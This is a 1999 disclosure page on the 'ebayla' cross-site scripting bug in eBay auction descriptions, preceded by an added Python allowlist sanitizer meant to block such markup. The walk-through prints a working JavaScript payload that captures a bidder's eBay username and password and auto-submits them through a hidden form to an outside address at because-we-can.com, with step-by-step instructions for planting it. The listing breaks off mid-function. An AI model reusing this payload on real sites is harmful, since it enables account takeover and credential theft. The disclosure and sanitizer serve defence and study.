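The fix the page asks for is an "adequate html filter" on the seller's side: an allowlist filter of that kind, added here as an example and not eBay's or Blue Adept's code, rebuilds a seller-supplied description from parsed tokens, keeps a handful of formatting tags, drops <script> elements together with their contents, drops event-handler attributes and javascript: links, and re-escapes all text so a description cannot inject markup into the bid page that renders it. The tag and attribute allowlist and the sample description (constructed, modelled on the demo listing quoted on this page) are assumptions of the example.

```python
"""Allowlist HTML filter for seller-supplied auction descriptions (added example)."""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"a", "b", "i", "u", "p", "br", "hr", "font"}
ALLOWED_ATTRS = {"a": {"href"}, "font": {"color", "size"}}
VOID_TAGS = {"br", "hr"}
DROP_CONTENT_TAGS = {"script", "style", "frameset", "form"}  # contents discarded too
SAFE_SCHEMES = ("http://", "https://", "mailto:")

class DescriptionSanitizer(HTMLParser):
    """Rebuilds the description from parsed tokens instead of patching the raw string."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # pieces of the sanitized output
        self.skip_depth = 0    # > 0 while inside a dropped element such as <script>
        self.open_tags = []    # allowed tags still awaiting their close tag
        self.findings = []     # what was removed, for the site's review log

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            self.skip_depth += tag in DROP_CONTENT_TAGS   # nested <form> inside <form>
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = 1
            self.findings.append(f"dropped <{tag}> and its contents")
            return
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"dropped <{tag}>")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):            # onLoad, onMouseOver, ...
                self.findings.append(f"dropped event handler {name} on <{tag}>")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append(f"dropped attribute {name} on <{tag}>")
            elif name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                self.findings.append(f"dropped href with unsafe scheme: {value[:40]!r}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= tag in DROP_CONTENT_TAGS
            return
        if tag in self.open_tags:
            while self.open_tags:              # close anything left open inside it
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text can never become markup

    def result(self):
        self.close()
        tail = "".join(f"</{t}>" for t in reversed(self.open_tags))
        self.open_tags = []
        return "".join(self.out) + tail

def sanitize_description(html_text):
    """Return (clean_html, findings) for one seller-supplied description."""
    parser = DescriptionSanitizer()
    parser.feed(html_text)
    return parser.result(), parser.findings

# Constructed sample, modelled on the demo listing quoted on this page.
SAMPLE_DESCRIPTION = (
    '1 car, comes with windows. crashes frequently. toy.<hr>See the '
    '<a href="http://www.because-we-can.com/ebayla/default.htm" onMouseOver="alert(1)">ebayla bug</a>.'
    '<script>recipient = "blue_adept@because-we-can.com"; document.writeln("</scr" + "ipt>");</script>'
    '<body onLoad=document.form1.submit()><a href="javascript:void(0)">bid now</a> &lt;script&gt;'
)
```

The findings list is what a site operator would log or review: a description that produces any finding deserves a look before the listing goes live.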
Once a malicious user knows the username/password of the victim's eBay account, she can assume full control of the account, including the ability to:

  o create new auctions (automatically charging the victim's account)
  o place bids in the victim's name,
  o retract legitimate bids in the victim's name,
  o change the victim's username/password, barring them from eBay,
  o associate bogus negative/positive comments with an arbitrary seller,
  o prematurely close an auction being run by the victim.
  o insert the ebayla code into the victim's auction. (The code could be altered to do this automatically, which would constitute an ebayla virus).

The security problem is dangerously easy to take advantage of. A malicious user needs only to embed the javascript code into their description of an item for auction. A walk-through of the exploit demonstrates step-by-step how any user can steal eBay passwords.

Blue Adept notified eBay that a 'huge' potential security problem existed on March 31, 1999 and offered assistance (but as of April 18, 1999 has only received form letter KMM798062C0KM in reply). Information about the ebayla exploit is being made publicly available to speed the process of fixing the security hole.

TRY THE EBAYLA BUG DEMO ON YOURSELF!

Visit a working demonstration of this exploit at eBay! The demo works with any javascript-enabled browser, such as Netscape or Internet Explorer. Users must register (free) with eBay to place bids.

** The demo is Blue Adept's own auction infected with eBayla code.

WARNING! When you bid on this item (or even just review your bid without placing it), your username and password will automatically be mailed back to because-we-can.com.

HOW TO PROTECT YOURSELF

Unfortunately, the potential security issues at eBay are difficult to spot and avoid.
If you are unfamiliar with spotting suspect javascript in the docsource of an html document, the best way to protect yourself may be to avoid using eBay until adequate html filters have been implemented.

THE EBAYLA BUG WALK-THROUGH

This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate that using only the items listed below, a malicious user can acquire eBay usernames and passwords. (To see a more efficient (2 line) version of the code that uses a Perl script, visit the live demo at eBay.)

INGREDIENTS:

  1 Computer with Internet Access
  1 email account

STEP 1: Visit ebay.com and register for a free user account.

STEP 2: Go to the seller's area to post an item for auction. When asked to enter the description of the item, post the following description, containing the ebayla code. The first line of the script indicates the email address to which usernames/passwords are to be sent.

1 car, comes with windows. crashes frequently. toy.<hr>
WARNING do not bid on this item!! This auction is a demonstration of the <a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>. If you place/review a bid, your username and password will be mailed to http://www.because-we-can.com.
<script>
recipient = "blue_adept@because-we-can.com";

function printframeset(place_bid, mailUrl, username, password){
  document.open();
  document.writeln('<script>');
  document.writeln('function go(){');
  document.writeln('top.b.document.open();');
  document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
  document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
  document.writeln('top.b.document.writeln("</form>")');
  document.writeln('top.b.document.close();');
  document.writeln('}');
  document.writeln('</scr' + 'ipt>');
  document.writeln('</head>');
  document.writeln('<frameset rows="100%,*" onLoad="go()">');
  document.writeln('<frame name="t" src="' + place_bid + '">');
  document.writeln('<frame name="b" src="">');
  document.writeln('</frameset>');
  document.close();
}

function urlEncode(inStr) {
  outStr=' '; //not '' for a NS bug!
  for (i=0; i < inStr.length; i++) {
    aChar=inStr.substring (i, i+1);
    switch(aChar){
      case '%': outStr += "%25"; break;
      case ',': outStr += "%2C"; break;
      case '/': outStr += "%2F"; break;
      case ':': outStr += "%3A"; break;
      case '~': outStr += "%7E"; break;
      case '!': outStr += "%21"; break;
      case '"': outStr += "%22"; break;
      case '#': outStr += "%23"; break;
      case '